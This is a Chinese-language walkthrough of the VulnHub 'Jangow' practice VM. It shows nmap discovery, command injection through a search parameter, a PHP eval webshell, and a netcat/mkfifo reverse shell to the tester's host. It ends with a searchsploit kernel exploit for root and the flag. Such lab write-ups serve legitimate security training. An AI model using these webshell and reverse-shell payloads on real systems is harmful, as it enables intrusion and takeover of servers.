项目地址
https://www.vulnhub.com/entry/jangow-101754/
部分vmware有配置问题,需要修改网卡信息,重启dhcp服务
1.在系统启动时(长按shift键)直到显示以下界面
选择第二个,按回车
继续选择第二个
2.按e进入编辑,进入以下界面
删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"
3.Ctrl+x 启动进入如下界面
修改网卡,重启dhcp服务
编辑文件sudo vim /etc/network/interfaces (将网卡信息设置为自己的网卡,重启电脑即可生效。)
实验过程
将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机
使用nmap进行主机发现,获取靶机IP地址
nmap 192.168.47.1-254
根据对比可知JANGOW的一个ip地址为192.168.47.142
该靶机开启了21端口和80端口
访问页面
http://192.168.47.142
点击site/发生了网页跳转
随便翻翻
当点击buscar时,出现一个空白界面
发现url有缺失,输入指令看看
发现执行成功了
上传一句话木马
192.168.47.142/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > 1.php
没有报错
尝试蚁剑连接
http://192.168.47.142/site/1.php
连接成功
四处翻找后,没有发现有价值的文件
用蚁剑反弹shell
创建一个shell.php文件,写入一句话木马
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.47.129 443 >/tmp/f");?>
在kali开启端口监听
nc -lvvp 443
在网站访问shell.php文件
http://192.168.47.142/site/shell.php
反弹成功
提权
获得交互式shell
python3 -c "import pty; pty.spawn('/bin/bash')"
查看系统内核版本
寻找可利用的exp
searchsploit ubuntu 4.4.0-31
将45010.c下载到本地
在本地进行编译
本地开启临时服务,让靶机下载exp文件
发现连接失败
拿蚁剑进行上传
上传成功
将exp文件转移到tmp目录下并运行
进入root模式,查看flag
